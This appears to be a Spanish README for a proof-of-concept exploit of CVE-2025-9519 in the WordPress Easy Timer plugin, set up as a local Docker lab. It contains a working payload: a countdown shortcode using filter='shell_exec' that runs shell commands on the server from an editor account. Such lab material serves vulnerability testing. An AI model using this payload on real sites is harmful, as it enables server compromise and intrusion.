
Prueba de concepto del exploit para CVE-2025-9519, que demuestra la ejecución remota de código en el plugin Easy Timer de WordPress mediante un filtro de shortcode manipulado, con configuración basada en Docker.
Consulta la documentación oficial de Docker para la instalación: Instalación de Docker Engine
Desde el directorio de tu proyecto:
sudo docker-compose up -d
mkdir -p wp-content/plugins
cd wp-content/plugins
wget https://downloads.wordpress.org/plugin/easy-timer.4.2.1.zip
unzip easy-timer.4.2.1.zip
sudo docker compose restart wordpress
http://localhost:8000/Panel de WordPress → Plugins → y haz clic en .
Easy TimerActivar
Desde el directorio de tu proyecto ejecuta el siguiente comando:
docker compose run --rm wpcli user create \
editoruser [email protected] \
--role=editor \
--user_pass=P@ssw0rd!
(nota: ¡reemplaza con tu elección de nombre de usuario, correo electrónico y contraseña!)
Entradas → Añadir nuevabloque de Shortcode e introduce:[countdown date=2025/12/17-00:00:00 filter="shell_exec"]ls -l[/countdown]
⚠️ Nota: Asegúrate de usar un bloque de Shortcode, no un bloque de Párrafo, para que el shortcode se renderice correctamente.

¡Felicidades, tienes RCE!

sudo docker ps
Deberías ver algo como:

Si los shortcodes no se renderizan:
Si al navegar a http://localhost:8000/ aparece Base de datos no conectada: